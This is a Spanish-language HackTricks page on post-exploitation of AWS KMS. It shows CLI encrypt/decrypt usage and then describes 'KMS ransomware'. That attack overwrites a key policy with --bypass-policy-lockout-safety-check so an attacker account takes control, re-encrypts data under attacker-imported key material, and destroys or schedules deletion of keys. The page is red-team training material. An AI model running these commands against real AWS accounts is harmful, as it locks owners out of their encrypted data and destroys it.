AWS - KMS Post Exploitation

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.

KMS

Para más información consulta:

AWS - KMS Enum

Cifrar/Descifrar información

fileb:// y file:// son esquemas URI utilizados en comandos de AWS CLI para especificar la ruta a archivos locales:

fileb://: Lee el archivo en modo binario, comúnmente utilizado para archivos no de texto.
file://: Lee el archivo en modo texto, típicamente utilizado para archivos de texto plano, scripts o JSON que no tienen requisitos de codificación especiales.

Ten en cuenta que si deseas descifrar algunos datos dentro de un archivo, el archivo debe contener los datos binarios, no datos codificados en base64. (fileb://)

Usando una clave simétrica

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

Usando una clave asimétrica:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Un atacante con acceso privilegiado sobre KMS podría modificar la política de KMS de las claves y otorgar acceso a su cuenta sobre ellas, eliminando el acceso otorgado a la cuenta legítima.

Entonces, los usuarios de la cuenta legítima no podrán acceder a ninguna información de ningún servicio que haya sido cifrado con esas claves, creando un ransomware fácil pero efectivo sobre la cuenta.

Tenga en cuenta que las claves administradas por AWS no se ven afectadas por este ataque, solo las claves administradas por el cliente.

También tenga en cuenta la necesidad de usar el parámetro --bypass-policy-lockout-safety-check (la falta de esta opción en la consola web hace que este ataque solo sea posible desde la CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Tenga en cuenta que si cambia esa política y solo da acceso a una cuenta externa, y luego desde esta cuenta externa intenta establecer una nueva política para devolver el acceso a la cuenta original, no podrá.

Ransomware KMS Genérico

Ransomware KMS Global

Hay otra forma de realizar un ransomware KMS global, que implicaría los siguientes pasos:

Crear una nueva clave con un material de clave importado por el atacante
Reencriptar datos antiguos encriptados con la versión anterior con la nueva.
Eliminar la clave KMS
Ahora solo el atacante, que tiene el material de clave original, podría ser capaz de desencriptar los datos encriptados

Destruir claves

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

Tenga en cuenta que AWS ahora previene que las acciones anteriores se realicen desde una cuenta cruzada:

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousAWS - IAM Post Exploitation NextAWS - Lambda Post Exploitation

Last updated 3 days ago